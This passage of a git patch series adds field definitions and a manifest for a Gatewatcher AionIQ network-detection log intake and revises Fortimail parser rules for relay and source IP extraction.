+  name: gatewatcher.ftp.reply_truncated
+  type: boolean
+gatewatcher.ftp_data.command:
+  description: ftp_data command field
+  name: gatewatcher.ftp_data.command
+  type: text
+gatewatcher.ftp_data.filename:
+  description: ftp_data filename field
+  name: gatewatcher.ftp_data.filename
+  type: text
+gatewatcher.gcap:
+  description: Name of the gcap
+  name: gatewatcher.gcap
+  type: keyword
+gatewatcher.gcenter:
+  description: Name of the associated gcenter
+  name: gatewatcher.gcenter
+  type: keyword
+gatewatcher.history.code:
+  description: history code field
+  name: gatewatcher.history.code
+  type: number
+gatewatcher.history.content:
+  description: history content field
+  name: gatewatcher.history.content
+  type: text
+gatewatcher.history.endpoint:
+  description: history endpoint field
+  name: gatewatcher.history.endpoint
+  type: text
+gatewatcher.history.id:
+  description: history id field
+  name: gatewatcher.history.id
+  type: number
+gatewatcher.history.ip:
+  description: history ip field
+  name: gatewatcher.history.ip
+  type: ip
+gatewatcher.history.method:
+  description: history method field
+  name: gatewatcher.history.method
+  type: text
+gatewatcher.history.name:
+  description: history name field
+  name: gatewatcher.history.name
+  type: text
+gatewatcher.history.type:
+  description: history type field
+  name: gatewatcher.history.type
+  type: text
+gatewatcher.http:
+  description: http metadata field
+  name: gatewatcher.http
+  type: text
+gatewatcher.http.accept:
+  description: 'http accept metadata field '
+  name: gatewatcher.http.accept
+  type: text
+gatewatcher.http.accept_language:
+  description: http accept language field
+  name: gatewatcher.http.accept_language
+  type: text
+gatewatcher.http.hostname:
+  description: http hostname field metadata
+  name: gatewatcher.http.hostname
+  type: text
+gatewatcher.http.http2:
+  description: http http2 field
+  name: gatewatcher.http.http2
+  type: text
+gatewatcher.http.http_refer:
+  description: http_refer field
+  name: gatewatcher.http.http_refer
+  type: text
+gatewatcher.ikev2.errors:
+  description: ikev2 errors field
+  name: gatewatcher.ikev2.errors
+  type: number
+gatewatcher.ikev2.exchange_type:
+  description: ikev2 exchange_type field
+  name: gatewatcher.ikev2.exchange_type
+  type: number
+gatewatcher.ikev2.init_spi:
+  description: ikev2 init_spi field
+  name: gatewatcher.ikev2.init_spi
+  type: text
+gatewatcher.ikev2.message_id:
+  description: ikev2 message_id field
+  name: gatewatcher.ikev2.message_id
+  type: number
+gatewatcher.ikev2.notify:
+  description: ikev2 notify field
+  name: gatewatcher.ikev2.notify
+  type: text
+gatewatcher.ikev2.payload:
+  description: ikev2 payload field
+  name: gatewatcher.ikev2.payload
+  type: text
+gatewatcher.ikev2.resp_spi:
+  description: ikev2 resp_spi field
+  name: gatewatcher.ikev2.resp_spi
+  type: text
+gatewatcher.ikev2.role:
+  description: ikev2 role field
+  name: gatewatcher.ikev2.role
+  type: text
+gatewatcher.ikev2.version_major:
+  description: ikev2 version_major field
+  name: gatewatcher.ikev2.version_major
+  type: number
+gatewatcher.ikev2.version_minor:
+  description: ikev2 version_minor field
+  name: gatewatcher.ikev2.version_minor
+  type: number
+gatewatcher.ioc.campaings:
+  description: ioc campaigns field
+  name: gatewatcher.ioc.campaings
+  type: text
+gatewatcher.ioc.case_id:
+  description: ioc case_id field
+  name: gatewatcher.ioc.case_id
+  type: text
+gatewatcher.ioc.categories:
+  description: ioc categories field
+  name: gatewatcher.ioc.categories
+  type: text
+gatewatcher.ioc.creation_date:
+  description: ioc creation_date field
+  name: gatewatcher.ioc.creation_date
+  type: datetime
+gatewatcher.ioc.description:
+  description: ioc description field
+  name: gatewatcher.ioc.description
+  type: text
+gatewatcher.ioc.extrernal_links:
+  description: ioc external_links field
+  name: gatewatcher.ioc.extrernal_links
+  type: text
+gatewatcher.ioc.families:
+  description: ioc families field
+  name: gatewatcher.ioc.families
+  type: text
+gatewatcher.ioc.kill_chain_phases:
+  description: ioc kill_chain_phases field
+  name: gatewatcher.ioc.kill_chain_phases
+  type: text
+gatewatcher.ioc.meta_data.cwe:
+  description: ioc meta_data cwe field
+  name: gatewatcher.ioc.meta_data.cwe
+  type: text
+gatewatcher.ioc.meta_data.descriptions:
+  description: ioc meta_data descriptions field
+  name: gatewatcher.ioc.meta_data.descriptions
+  type: text
+gatewatcher.ioc.meta_data.usageMode:
+  description: ioc meta_data usageMode field
+  name: gatewatcher.ioc.meta_data.usageMode
+  type: text
+gatewatcher.ioc.package_date:
+  description: ioc package_date field
+  name: gatewatcher.ioc.package_date
+  type: datetime
+gatewatcher.ioc.relations:
+  description: ioc relations field
+  name: gatewatcher.ioc.relations
+  type: text
+gatewatcher.ioc.signature:
+  description: ioc signature field
+  name: gatewatcher.ioc.signature
+  type: text
+gatewatcher.ioc.tags:
+  description: ioc tags field
+  name: gatewatcher.ioc.tags
+  type: text
+gatewatcher.ioc.targeted_countries:
+  description: ioc targeted_countires field
+  name: gatewatcher.ioc.targeted_countries
+  type: text
+gatewatcher.ioc.targeted_organizations:
+  description: ioc targeted_organizations field
+  name: gatewatcher.ioc.targeted_organizations
+  type: text
+gatewatcher.ioc.targeted_platforms:
+  description: ioc targeted_platforms field
+  name: gatewatcher.ioc.targeted_platforms
+  type: text
+gatewatcher.ioc.targeted_sectors:
+  description: ioc targeted_sectors field
+  name: gatewatcher.ioc.targeted_sectors
+  type: text
+gatewatcher.ioc.threat_actor:
+  description: ioc threat_actor field
+  name: gatewatcher.ioc.threat_actor
+  type: text
+gatewatcher.ioc.tlp:
+  description: ioc tlp field
+  name: gatewatcher.ioc.tlp
+  type: text
+gatewatcher.ioc.ttp:
+  description: ioc ttp field
+  name: gatewatcher.ioc.ttp
+  type: text
+gatewatcher.ioc.type:
+  description: ioc type field
+  name: gatewatcher.ioc.type
+  type: text
+gatewatcher.ioc.updated_date:
+  description: ioc updated_date field
+  name: gatewatcher.ioc.updated_date
+  type: datetime
+gatewatcher.ioc.usage_mode:
+  description: ioc usage_mode field
+  name: gatewatcher.ioc.usage_mode
+  type: text
+gatewatcher.ioc.value:
+  description: ioc value field
+  name: gatewatcher.ioc.value
+  type: text
+gatewatcher.krb5.cname:
+  description: krb5 cname field
+  name: gatewatcher.krb5.cname
+  type: text
+gatewatcher.krb5.encryption:
+  description: krb5 encryption field
+  name: gatewatcher.krb5.encryption
+  type: text
+gatewatcher.krb5.error_code:
+  description: krb5 error_code field
+  name: gatewatcher.krb5.error_code
+  type: text
+gatewatcher.krb5.failed_request:
+  description: krb5 failed_request field
+  name: gatewatcher.krb5.failed_request
+  type: text
+gatewatcher.krb5.msg_type:
+  description: krb5 msg_type field
+  name: gatewatcher.krb5.msg_type
+  type: text
+gatewatcher.krb5.realm:
+  description: krb5 realm field
+  name: gatewatcher.krb5.realm
+  type: text
+gatewatcher.krb5.sname:
+  description: krb5 sname field
+  name: gatewatcher.krb5.sname
+  type: text
+gatewatcher.krb5.weak_encryption:
+  description: krb5 weak_encryption field
+  name: gatewatcher.krb5.weak_encryption
+  type: boolean
+gatewatcher.malcore.analyzed_clean:
+  description: malcore analyzed_clean field
+  name: gatewatcher.malcore.analyzed_clean
+  type: number
+gatewatcher.malcore.analyzed_error:
+  description: malcore analyzed_error field
+  name: gatewatcher.malcore.analyzed_error
+  type: number
+gatewatcher.malcore.analyzed_infected:
+  description: malcore analyzed_infected field
+  name: gatewatcher.malcore.analyzed_infected
+  type: number
+gatewatcher.malcore.analyzed_other:
+  description: malcore analyzed_other field
+  name: gatewatcher.malcore.analyzed_other
+  type: number
+gatewatcher.malcore.analyzed_suspicious:
+  description: malcore analyzed_suspicious field
+  name: gatewatcher.malcore.analyzed_suspicious
+  type: number
+gatewatcher.malcore.analyzers_up:
+  description: malcore analyzers_up field
+  name: gatewatcher.malcore.analyzers_up
+  type: number
+gatewatcher.malcore.code:
+  description: malcore code field
+  name: gatewatcher.malcore.code
+  type: number
+gatewatcher.malcore.detail_scan_time:
+  description: malcore detail_scan_time field
+  name: gatewatcher.malcore.detail_scan_time
+  type: number
+gatewatcher.malcore.detail_threat_found:
+  description: malcore detail_threat_found field
+  name: gatewatcher.malcore.detail_threat_found
+  type: text
+gatewatcher.malcore.detail_wait_time:
+  description: malcore detail_wait_time field
+  name: gatewatcher.malcore.detail_wait_time
+  type: number
+gatewatcher.malcore.engine_id:
+  description: malcore engine_id field
+  name: gatewatcher.malcore.engine_id
+  type: text
+gatewatcher.malcore.engines_last_update_date:
+  description: malcore engines_last_update_date field
+  name: gatewatcher.malcore.engines_last_update_date
+  type: datetime
+gatewatcher.malcore.file:
+  description: Identifier of the file
+  name: gatewatcher.malcore.file
+  type: keyword
+gatewatcher.malcore.file_type:
+  description: malcore file_type field
+  name: gatewatcher.malcore.file_type
+  type: text
+gatewatcher.malcore.file_type_description:
+  description: malcore file_type_description field
+  name: gatewatcher.malcore.file_type_description
+  type: text
+gatewatcher.malcore.magic:
+  description: The magic number of the executable of the malware
+  name: gatewatcher.malcore.magic
+  type: keyword
+gatewatcher.malcore.magic_details:
+  description: malcore magic_details field
+  name: gatewatcher.malcore.magic_details
+  type: text
+gatewatcher.malcore.processing_time:
+  description: malcore processing_time field
+  name: gatewatcher.malcore.processing_time
+  type: number
+gatewatcher.malcore.replica:
+  description: Analysis is a replica of another previous one
+  name: gatewatcher.malcore.replica
+  type: keyword
+gatewatcher.malcore.reporting_token:
+  description: malcore reporting_token field
+  name: gatewatcher.malcore.reporting_token
+  type: text
+gatewatcher.malcore.state:
+  description: malcore state field
+  name: gatewatcher.malcore.state
+  type: text
+gatewatcher.malcore.total_found:
+  description: malcore total_found field
+  name: gatewatcher.malcore.total_found
+  type: text
+gatewatcher.malicious_powershell.id:
+  description: malicious_powershell id field
+  name: gatewatcher.malicious_powershell.id
+  type: text
+gatewatcher.malicious_powershell.proba_obfuscated:
+  description: malicious_powershell proba_obfuscated field
+  name: gatewatcher.malicious_powershell.proba_obfuscated
+  type: number
+gatewatcher.malicious_powershell.sample_id:
+  description: malicious_powershell sample_id field
+  name: gatewatcher.malicious_powershell.sample_id
+  type: text
+gatewatcher.malicious_powershell.score:
+  description: malicious_powershell score field
+  name: gatewatcher.malicious_powershell.score
+  type: number
+gatewatcher.malicious_powershell.score_details:
+  description: malicious_powershell score_details field
+  name: gatewatcher.malicious_powershell.score_details
+  type: text
+gatewatcher.matched_event.file.gaps:
+  description: matched_event file gaps field
+  name: gatewatcher.matched_event.file.gaps
+  type: text
+gatewatcher.matched_event.file.hash.md5:
+  description: matched_event file hash md5 field
+  name: gatewatcher.matched_event.file.hash.md5
+  type: text
+gatewatcher.matched_event.file.hash.sha256:
+  description: matched_event file hash sha256 field
+  name: gatewatcher.matched_event.file.hash.sha256
+  type: text
+gatewatcher.matched_event.file.magic:
+  description: matched_event file magic field
+  name: gatewatcher.matched_event.file.magic
+  type: text
+gatewatcher.matched_event.file.name:
+  description: matched_event file name field
+  name: gatewatcher.matched_event.file.name
+  type: text
+gatewatcher.matched_event.file.sid:
+  description: matched_event file sid field
+  name: gatewatcher.matched_event.file.sid
+  type: text
+gatewatcher.matched_event.file.size:
+  description: matched_event file size field
+  name: gatewatcher.matched_event.file.size
+  type: text
+gatewatcher.matched_event.file.state:
+  description: matched_event file state field
+  name: gatewatcher.matched_event.file.state
+  type: text
+gatewatcher.matched_event.file.stored:
+  description: matched_event file stored field
+  name: gatewatcher.matched_event.file.stored
+  type: text
+gatewatcher.matched_event.file.tx_id:
+  description: matched_event file tx_id field
+  name: gatewatcher.matched_event.file.tx_id
+  type: text
+gatewatcher.matched_event.id:
+  description: matched_event id field
+  name: gatewatcher.matched_event.id
+  type: text
+gatewatcher.metadata.flowbits:
+  description: metadata flowbits field
+  name: gatewatcher.metadata.flowbits
+  type: text
+gatewatcher.mqtt.connack:
+  description: mqtt connack field
+  name: gatewatcher.mqtt.connack
+  type: text
+gatewatcher.nb_rescans:
+  description: Number of retroact analysis
+  name: gatewatcher.nb_rescans
+  type: long
+gatewatcher.nba.action:
+  description: nba action field
+  name: gatewatcher.nba.action
+  type: text
+gatewatcher.nba.category:
+  description: nba category field
+  name: gatewatcher.nba.category
+  type: text
+gatewatcher.nba.gid:
+  description: nba gid field
+  name: gatewatcher.nba.gid
+  type: text
+gatewatcher.nba.metadata.performance_impact:
+  description: nba metadata performance_impact field
+  name: gatewatcher.nba.metadata.performance_impact
+  type: text
+gatewatcher.nba.metadata.signature_severity:
+  description: nba metadata signature_severity field
+  name: gatewatcher.nba.metadata.signature_severity
+  type: text
+gatewatcher.nba.packet:
+  description: nba packet field
+  name: gatewatcher.nba.packet
+  type: text
+gatewatcher.nba.payload:
+  description: nba payload field
+  name: gatewatcher.nba.payload
+  type: text
+gatewatcher.nba.payload_printable:
+  description: nba payload_printable field
+  name: gatewatcher.nba.payload_printable
+  type: text
+gatewatcher.nba.rev:
+  description: nba rev field
+  name: gatewatcher.nba.rev
+  type: text
+gatewatcher.nba.signature:
+  description: nba signature field
+  name: gatewatcher.nba.signature
+  type: text
+gatewatcher.nba.signature_id:
+  description: nba signature_id field
+  name: gatewatcher.nba.signature_id
+  type: text
+gatewatcher.nba.stream:
+  description: nba stream field
+  name: gatewatcher.nba.stream
+  type: text
+gatewatcher.network.flow_id:
+  description: Gatewatcher specific flow_id for network part
+  name: gatewatcher.network.flow_id
+  type: number
+gatewatcher.network.timestamp:
+  description: Network timestamp field
+  name: gatewatcher.network.timestamp
+  type: datetime
+gatewatcher.network.tx_id:
+  description: tx_id network field
+  name: gatewatcher.network.tx_id
+  type: number
+gatewatcher.nfs.file_tx:
+  description: nfs file_tx field
+  name: gatewatcher.nfs.file_tx
+  type: boolean
+gatewatcher.nfs.filename:
+  description: nfs filename field
+  name: gatewatcher.nfs.filename
+  type: text
+gatewatcher.nfs.hhash:
+  description: nfs hhash field
+  name: gatewatcher.nfs.hhash
+  type: text
+gatewatcher.nfs.id:
+  description: nfs id field
+  name: gatewatcher.nfs.id
+  type: number
+gatewatcher.nfs.procedure:
+  description: nfs procedure field
+  name: gatewatcher.nfs.procedure
+  type: text
+gatewatcher.nfs.status:
+  description: nfs status field
+  name: gatewatcher.nfs.status
+  type: text
+gatewatcher.nfs.type:
+  description: nfs type field
+  name: gatewatcher.nfs.type
+  type: text
+gatewatcher.nfs.version:
+  description: nfs version field
+  name: gatewatcher.nfs.version
+  type: number
+gatewatcher.notification.component:
+  description: notification component field
+  name: gatewatcher.notification.component
+  type: text
+gatewatcher.notification.description:
+  description: notification description field
+  name: gatewatcher.notification.description
+  type: text
+gatewatcher.notification.details:
+  description: notification details field
+  name: gatewatcher.notification.details
+  type: text
+gatewatcher.notification.external_redirection:
+  description: notification external_redirection field
+  name: gatewatcher.notification.external_redirection
+  type: text
+gatewatcher.notification.internal_redirection:
+  description: notification internal_redirection field
+  name: gatewatcher.notification.internal_redirection
+  type: text
+gatewatcher.notification.resolution:
+  description: notification resolution field
+  name: gatewatcher.notification.resolution
+  type: text
+gatewatcher.notification.risk:
+  description: notification risk field
+  name: gatewatcher.notification.risk
+  type: number
+gatewatcher.notification.title:
+  description: notification title field
+  name: gatewatcher.notification.title
+  type: text
+gatewatcher.observer.gcap.hostname:
+  description: GCap hostname field
+  name: gatewatcher.observer.gcap.hostname
+  type: text
+gatewatcher.observer.gcap.ingress.interface.name:
+  description: Gatewatcher ingress interface name
+  name: gatewatcher.observer.gcap.ingress.interface.name
+  type: text
+gatewatcher.observer.gcap.version:
+  description: GCap version observer field
+  name: gatewatcher.observer.gcap.version
+  type: text
+gatewatcher.observer.log_format_version:
+  description: Observer log format version field
+  name: gatewatcher.observer.log_format_version
+  type: text
+gatewatcher.observer.uuid:
+  description: Observer UUID field
+  name: gatewatcher.observer.uuid
+  type: text
+gatewatcher.ransomware.alert_threshold:
+  description: ransomware alert_threshold field
+  name: gatewatcher.ransomware.alert_threshold
+  type: text
+gatewatcher.ransomware.malicious_behavior_confidence:
+  description: ransomware malicious_behavior_confidence field
+  name: gatewatcher.ransomware.malicious_behavior_confidence
+  type: text
+gatewatcher.ransomware.session_score:
+  description: ransomware session_score field
+  name: gatewatcher.ransomware.session_score
+  type: text
+gatewatcher.rdp.channels:
+  description: rdp channels field
+  name: gatewatcher.rdp.channels
+  type: text
+gatewatcher.rdp.client:
+  description: rdp client field
+  name: gatewatcher.rdp.client
+  type: text
+gatewatcher.rdp.cookie:
+  description: rdp cookie field
+  name: gatewatcher.rdp.cookie
+  type: text
+gatewatcher.rdp.event_type:
+  description: rdp event_type field
+  name: gatewatcher.rdp.event_type
+  type: text
+gatewatcher.rdp.protocol:
+  description: rdp protocol field
+  name: gatewatcher.rdp.protocol
+  type: text
+gatewatcher.rdp.server_supports:
+  description: rdp server_supports field
+  name: gatewatcher.rdp.server_supports
+  type: text
+gatewatcher.rdp.tx_id:
+  description: rdp tx_id field
+  name: gatewatcher.rdp.tx_id
+  type: number
+gatewatcher.reporting_token:
+  description: Token used by Gbox
+  name: gatewatcher.reporting_token
+  type: keyword
+gatewatcher.retroact:
+  description: Analysis result per retroact
+  name: gatewatcher.retroact
+  type: keyword
+gatewatcher.rfb.authentication:
+  description: rfb authentication field
+  name: gatewatcher.rfb.authentication
+  type: text
+gatewatcher.rfb.client_protocol_version:
+  description: rfb client_protocol_version field
+  name: gatewatcher.rfb.client_protocol_version
+  type: text
+gatewatcher.rfb.server_protocol_version:
+  description: rfb server_protocol_version field
+  name: gatewatcher.rfb.server_protocol_version
+  type: text
+gatewatcher.rfb.server_security_failure_reason:
+  description: rfb server_security_failure_reason field
+  name: gatewatcher.rfb.server_security_failure_reason
+  type: text
+gatewatcher.shellcode.analysis:
+  description: shellcode analysis field
+  name: gatewatcher.shellcode.analysis
+  type: text
+gatewatcher.shellcode.encodings:
+  description: shellcode encodings field
+  name: gatewatcher.shellcode.encodings
+  type: text
+gatewatcher.shellcode.id:
+  description: shellcode id field
+  name: gatewatcher.shellcode.id
+  type: text
+gatewatcher.shellcode.sample_id:
+  description: shellcode sample_id field
+  name: gatewatcher.shellcode.sample_id
+  type: text
+gatewatcher.shellcode.sub_type:
+  description: shellcode sub_type field
+  name: gatewatcher.shellcode.sub_type
+  type: text
+gatewatcher.sigflow.action:
+  description: sigflow action field
+  name: gatewatcher.sigflow.action
+  type: text
+gatewatcher.sigflow.category:
+  description: sigflow category field
+  name: gatewatcher.sigflow.category
+  type: text
+gatewatcher.sigflow.gid:
+  description: sigflow gid field
+  name: gatewatcher.sigflow.gid
+  type: number
+gatewatcher.sigflow.metadata:
+  description: sigflow metadata field
+  name: gatewatcher.sigflow.metadata
+  type: text
+gatewatcher.sigflow.packet:
+  description: sigflow packet field
+  name: gatewatcher.sigflow.packet
+  type: text
+gatewatcher.sigflow.packet_info:
+  description: sigflow packet_info field
+  name: gatewatcher.sigflow.packet_info
+  type: text
+gatewatcher.sigflow.payload:
+  description: sigflow payload field
+  name: gatewatcher.sigflow.payload
+  type: text
+gatewatcher.sigflow.payload_printable:
+  description: sigflow payload_printable field
+  name: gatewatcher.sigflow.payload_printable
+  type: text
+gatewatcher.sigflow.rev:
+  description: sigflow rev field
+  name: gatewatcher.sigflow.rev
+  type: number
+gatewatcher.sigflow.signature:
+  description: sigflow signature field
+  name: gatewatcher.sigflow.signature
+  type: text
+gatewatcher.sigflow.signature_id:
+  description: sigflow signature_id field
+  name: gatewatcher.sigflow.signature_id
+  type: number
+gatewatcher.sigflow.stream:
+  description: sigflow stream field
+  name: gatewatcher.sigflow.stream
+  type: number
+gatewatcher.sip.method:
+  description: sip method field
+  name: gatewatcher.sip.method
+  type: text
+gatewatcher.sip.request_line:
+  description: sip request_line field
+  name: gatewatcher.sip.request_line
+  type: text
+gatewatcher.sip.uri:
+  description: sip uri field
+  name: gatewatcher.sip.uri
+  type: text
+gatewatcher.sip.version:
+  description: sip version field
+  name: gatewatcher.sip.version
+  type: text
+gatewatcher.smb:
+  description: smb metadata field
+  name: gatewatcher.smb
+  type: text
+gatewatcher.smb.command:
+  description: smb command field
+  name: gatewatcher.smb.command
+  type: text
+gatewatcher.smb.dialect:
+  description: smb dialect field
+  name: gatewatcher.smb.dialect
+  type: text
+gatewatcher.smb.id:
+  description: smb id field
+  name: gatewatcher.smb.id
+  type: number
+gatewatcher.smb.session_id:
+  description: smb session id field
+  name: gatewatcher.smb.session_id
+  type: number
+gatewatcher.smb.status:
+  description: smb status field
+  name: gatewatcher.smb.status
+  type: text
+gatewatcher.smb.status_code:
+  description: smb status_code field
+  name: gatewatcher.smb.status_code
+  type: text
+gatewatcher.smb.tree_id:
+  description: smb tree_id field
+  name: gatewatcher.smb.tree_id
+  type: number
+gatewatcher.smtp.helo:
+  description: smtp helo field
+  name: gatewatcher.smtp.helo
+  type: text
+gatewatcher.smtp.mail_from:
+  description: smtp mail from field
+  name: gatewatcher.smtp.mail_from
+  type: text
+gatewatcher.smtp.rcpt_to:
+  description: smtp recipients field
+  name: gatewatcher.smtp.rcpt_to
+  type: text
+gatewatcher.snmp.community:
+  description: snmp community field
+  name: gatewatcher.snmp.community
+  type: text
+gatewatcher.snmp.pdu_type:
+  description: snmp pdu_type field
+  name: gatewatcher.snmp.pdu_type
+  type: text
+gatewatcher.snmp.vars:
+  description: snmp vars field
+  name: gatewatcher.snmp.vars
+  type: text
+gatewatcher.snmp.version:
+  description: snmp version field
+  name: gatewatcher.snmp.version
+  type: number
+gatewatcher.ssh.client.hassh:
+  description: ssh client hassh field
+  name: gatewatcher.ssh.client.hassh
+  type: text
+gatewatcher.ssh.client.proto_version:
+  description: ssh client proto_version field
+  name: gatewatcher.ssh.client.proto_version
+  type: text
+gatewatcher.ssh.client.software_version:
+  description: ssh client software_version field
+  name: gatewatcher.ssh.client.software_version
+  type: text
+gatewatcher.ssh.server.hassh:
+  description: ssh server hassh field
+  name: gatewatcher.ssh.server.hassh
+  type: text
+gatewatcher.ssh.server.proto_version:
+  description: ssh server proto_version field
+  name: gatewatcher.ssh.server.proto_version
+  type: text
+gatewatcher.ssh.server.software_version:
+  description: ssh server software_version field
+  name: gatewatcher.ssh.server.software_version
+  type: text
+gatewatcher.state:
+  description: Analysis result
+  name: gatewatcher.state
+  type: keyword
+gatewatcher.syslog.message:
+  description: syslog message field
+  name: gatewatcher.syslog.message
+  type: text
+gatewatcher.tftp.file:
+  description: tftp file field
+  name: gatewatcher.tftp.file
+  type: text
+gatewatcher.tftp.mode:
+  description: tftp mode field
+  name: gatewatcher.tftp.mode
+  type: text
+gatewatcher.tftp.packet:
+  description: tftp packet field
+  name: gatewatcher.tftp.packet
+  type: text
+gatewatcher.timestamp_analyzed:
+  description: Timestamp of the alert processing by gcenter
+  name: gatewatcher.timestamp_analyzed
+  type: keyword
+gatewatcher.timestamp_detected:
+  description: Timestamp of the file collection by gcap
+  name: gatewatcher.timestamp_detected
+  type: keyword
+gatewatcher.tls:
+  description: TLS meta data field
+  name: gatewatcher.tls
+  type: text
+gatewatcher.type:
+  description: Type of analysis
+  name: gatewatcher.type
+  type: keyword
+gatewatcher.user_agent.major:
+  description: user_agent major field
+  name: gatewatcher.user_agent.major
+  type: text
+gatewatcher.user_agent.minor:
+  description: user_agent minor field
+  name: gatewatcher.user_agent.minor
+  type: text
+gatewatcher.user_agent.os.major:
+  description: user_agent os major field
+  name: gatewatcher.user_agent.os.major
+  type: text
+gatewatcher.user_agent.os.patch:
+  description: user_agent os patch field
+  name: gatewatcher.user_agent.os.patch
+  type: text
+gatewatcher.version:
+  description: '@version field'
+  name: gatewatcher.version
+  type: text
diff --git a/GateWatcher/aioniq_ecs/_meta/manifest.yml b/GateWatcher/aioniq_ecs/_meta/manifest.yml
new file mode 100644
index 000000000..d6480f719
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/_meta/manifest.yml
@@ -0,0 +1,11 @@
+uuid: e9fbba55-89c2-4b6c-ad15-9a46412dd680
+name: Gatewatcher AionIQ V103
+slug: aioniq-v103
+
+description: >-
+  A new detection and response platform (NDR) that enables to identify with certainty malicious actions and suspicious behaviors based on a mapping of all assets present on the information system.
+
+data_sources:
+  Network intrusion detection system: AIONIQ identify suspicious behaviors
+  Network protocol analysis: AIONIQ analyze traffic protocol
+

From a3f7bee5e8edff31b1b70decf0cad0233c5ab20e Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 11 Sep 2024 13:35:25 +0300
Subject: [PATCH 010/317] Fortimail - improve `relay` parsing

---
 Fortinet/fortimail/ingest/parser.yml | 21 +++++++++++++++++----
 1 file changed, 17 insertions(+), 4 deletions(-)

diff --git a/Fortinet/fortimail/ingest/parser.yml b/Fortinet/fortimail/ingest/parser.yml
index ec1ea7dbe..b3ccda162 100644
--- a/Fortinet/fortimail/ingest/parser.yml
+++ b/Fortinet/fortimail/ingest/parser.yml
@@ -61,7 +61,9 @@ pipeline:
       properties:
         input_field: parsed_event.message.msg
         output_field: msg
-        pattern: 'to=%{DATA:email_to}, (delay=%{DATA:tmp_delay}, )?(xdelay=%{DATA:tmp_xdelay}, )?(mailer=%{DATA:tmp_mailer}, )?(pri=%{NUMBER:tmp_priority_level_msg}, )?(relay=%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\], )?(dsn=%{DATA:tmp_dsn_version}, )?stat=%{GREEDYDATA:event_reason}'
+        pattern: 'to=%{DATA:email_to}, (delay=%{DATA:tmp_delay}, )?(xdelay=%{DATA:tmp_xdelay}, )?(mailer=%{DATA:tmp_mailer}, )?(pri=%{NUMBER:tmp_priority_level_msg}, )?(relay=%{RELAY_INFO:relay}, )?(dsn=%{DATA:tmp_dsn_version}, )?stat=%{GREEDYDATA:event_reason}'
+        custom_patterns:
+          RELAY_INFO: '(%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\])|(\[%{IP:_destination_ip1}\] \[%{IP:_destination_ip2}\])'
     filter: "{{parsed_event.message.get('type') == 'event' and parsed_event.message.get('msg') and 'stat=' in parsed_event.message.get('msg')}}"
 
   - name: parse_webfilter_full_url
@@ -140,7 +142,6 @@ stages:
           action.properties.nrcpts: "{{parse_event_with_no_stat.msg.nrcpts}}"
           action.properties.policy_id: "{{parsed_event.message.polid}}"
           action.properties.priority_level_msg: "{{parse_stat_message.msg.tmp_priority_level_msg or parse_event_with_no_stat.msg.pri}}"
-          action.properties.relay: '{{parse_event_with_no_stat.msg.relay.split(" ")[0].replace("[", "").replace("]", "")}}'
           action.properties.session_id: "{{parsed_event.message.session_id}}"
           action.properties.source_country: "{{parsed_event.message.client_cc}}"
           action.properties.spam_category: "{{parse_webfilter_full_url.msg.tmp_spam_category}}"
@@ -153,8 +154,20 @@ stages:
           action.properties.xdelay: "{{parse_stat_message.msg.tmp_xdelay or parse_event_with_no_stat.msg.xdelay }}"
 
       - set:
-          source.ip: "{{parsed_event.message.relay.replace('[', '').replace(']', '')}}"
-        filter: "{{parsed_event.message.get('relay') != None}}"
+          action.properties.relay: >
+            {%- set tmp = parse_event_with_no_stat.msg.relay.split(" ") -%}
+            {%- if tmp[0] | length > 0 -%}{{ tmp[0].strip().strip('[]') }}{%- elif tmp[1] | length > 0 -%}{{ tmp[1].strip().strip('[]') }}{%- endif -%}
+        filter: "{{parse_event_with_no_stat.msg.relay | length > 0}}"
+
+      - set:
+          action.properties.relay: >
+            {%- set tmp = parse_stat_message.msg.relay.split(" ") -%}
+            {%- if tmp[0] | length > 0 -%}{{ tmp[0].strip().strip('[]') }}{%- elif tmp[1] | length > 0 -%}{{ tmp[1].strip().strip('[]') }}{%- endif -%}
+        filter: "{{parse_stat_message.msg.relay | length > 0}}"
+
+      - set:
+          source.ip: "{{final.action.properties.relay}}"
+        filter: "{{final.action.properties.relay | is_ipaddress}}"
 
       - set:
           source.ip: "{{parse_ui.msg.source_ip}}"

From 2059e61812379b430d07e6c335186fc84cda098c Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 11 Sep 2024 13:46:32 +0300
Subject: [PATCH 011/317] Fix source.ip parsing

---
 Fortinet/fortimail/ingest/parser.yml          | 66 +++++++++++++++----
 Fortinet/fortimail/tests/encrypt.json         |  3 -
 Fortinet/fortimail/tests/esmtp.json           | 19 ++++--
 Fortinet/fortimail/tests/event.json           | 14 +++-
 Fortinet/fortimail/tests/event_smpt_to_1.json |  1 +
 Fortinet/fortimail/tests/event_smpt_to_2.json |  1 +
 .../fortimail/tests/event_smtp_STARTTLS.json  | 12 +++-
 Fortinet/fortimail/tests/event_smtp_to.json   |  4 +-
 .../fortimail/tests/event_smtp_to_bis.json    |  4 +-
 Fortinet/fortimail/tests/kevent.json          |  3 -
 Fortinet/fortimail/tests/relay_ip_only.json   | 64 ++++++++++++++++++
 Fortinet/fortimail/tests/short_event.json     | 51 ++++++++++++++
 ...ent_STARTTLS_client_local_certificate.json |  3 -
 ...ent_STARTTLS_server_local_certificate.json |  3 -
 ...nt_STARTTLS_server_signed_certificate.json |  3 -
 .../tests/smtp_event_to_user_unknown.json     |  3 -
 Fortinet/fortimail/tests/spam.json            |  3 -
 .../fortimail/tests/spam_antispam_url.json    |  3 -
 Fortinet/fortimail/tests/spam_antivirus.json  |  3 -
 .../fortimail/tests/spam_webfilter_url.json   |  3 -
 .../fortimail/tests/spam_webfilter_url_1.json |  3 -
 Fortinet/fortimail/tests/statistics.json      |  3 -
 Fortinet/fortimail/tests/virus.json           |  3 -
 Fortinet/fortimail/tests/virus_1.json         |  3 -
 24 files changed, 210 insertions(+), 68 deletions(-)
 create mode 100644 Fortinet/fortimail/tests/relay_ip_only.json
 create mode 100644 Fortinet/fortimail/tests/short_event.json

diff --git a/Fortinet/fortimail/ingest/parser.yml b/Fortinet/fortimail/ingest/parser.yml
index b3ccda162..09a3fbb8b 100644
--- a/Fortinet/fortimail/ingest/parser.yml
+++ b/Fortinet/fortimail/ingest/parser.yml
@@ -7,6 +7,17 @@ pipeline:
       properties:
         input_field: "{{original.message}}"
 
+  - name: parse_short_event
+    external:
+      name: grok.match
